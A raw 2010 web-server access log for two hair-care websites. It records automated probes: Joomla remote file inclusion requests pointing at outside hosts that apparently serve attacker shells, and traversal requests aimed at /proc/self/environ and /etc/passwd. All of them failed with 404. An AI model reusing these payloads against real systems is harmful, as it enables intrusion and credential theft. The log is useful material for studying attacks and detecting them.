212.69.194.227 - - [28/Jun/2010:08:39:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:08:39:48 -0700] "GET /logs/access.log//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:39:48 -0700] "GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:39:48 -0700] "GET /logs//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.37.133 - - [28/Jun/2010:08:39:52 -0700] "GET /logs/access_100215.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:40:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:40:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:40:17 -0700] "GET /logs/access_100503.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.22.67.37 - - [28/Jun/2010:08:40:22 -0700] "GET /logs/access.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:40:22 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:40:22 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.150.189.35 - - [28/Jun/2010:08:40:27 -0700] "GET /logs/access_100322.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:40:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:40:29 -0700] "GET /logs/access_100503.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:08:40:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.223.63.220 - - [28/Jun/2010:08:41:15 -0700] "GET /logs/access_100503.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.223.63.220 - - [28/Jun/2010:08:41:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.223.63.220 - - [28/Jun/2010:08:41:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:08:43:53 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 2504047 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
67.19.58.162 - - [28/Jun/2010:08:44:39 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
67.19.58.162 - - [28/Jun/2010:08:44:39 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
67.19.58.162 - - [28/Jun/2010:08:44:39 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:08:44:52 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:08:44:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:08:44:53 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:46:30 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:46:30 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.22.67.37 - - [28/Jun/2010:08:46:30 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:48:10 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:48:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:48:10 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:08:48:27 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 2097152 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:49:51 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:49:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:49:52 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:50:22 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:50:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:50:24 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:08:50:37 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:08:50:41 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
88.198.177.230 - - [28/Jun/2010:08:50:48 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:08:50:51 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:08:50:53 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
88.198.177.230 - - [28/Jun/2010:08:51:00 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:51:04 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:51:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:51:05 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:51:38 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:51:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:51:39 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:08:52:33 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:08:52:49 -0700] "GET /logs/access.log//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:52:49 -0700] "GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.238.72.218 - - [28/Jun/2010:08:52:49 -0700] "GET /logs//index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:08:53:14 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.71.53.4 - - [28/Jun/2010:08:53:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:53:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
206.71.53.4 - - [28/Jun/2010:08:53:49 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:08:54:10 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
77.72.200.38 - - [28/Jun/2010:08:55:25 -0700] "GET /logs/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.72.200.38 - - [28/Jun/2010:08:55:26 -0700] "GET /com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:08:55:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.72.200.38 - - [28/Jun/2010:08:56:14 -0700] "GET /logs/access_100308.log/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.72.200.38 - - [28/Jun/2010:08:56:14 -0700] "GET /com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.72.200.38 - - [28/Jun/2010:08:56:14 -0700] "GET /logs/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:08:56:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:08:56:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.72.200.38 - - [28/Jun/2010:08:58:28 -0700] "GET /com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.19.58.162 - - [28/Jun/2010:09:01:08 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
67.19.58.162 - - [28/Jun/2010:09:01:08 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
67.19.58.162 - - [28/Jun/2010:09:01:08 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:09:02:12 -0700] "GET /logs/access_100405.log HTTP/1.1" 200 2516499 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:03:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:03:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:03:07 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:03:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:03:08 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:03:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:03:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:03:59 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:04:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:04:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.72.200.38 - - [28/Jun/2010:09:04:25 -0700] "GET /logs/access_100329.log/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.72.200.38 - - [28/Jun/2010:09:04:25 -0700] "GET /com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.72.200.38 - - [28/Jun/2010:09:04:25 -0700] "GET /logs/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:04:36 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:04:36 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:04:36 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:04:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.72.200.38 - - [28/Jun/2010:09:08:19 -0700] "GET /logs/access_100315.log/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:09:08:36 -0700] "GET /logs/access_100412.log HTTP/1.1" 200 2139776 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:09:10:11 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 2205014 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:10:54 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:10:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:10:55 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:10:56 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:10:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:10:57 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:11:05 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
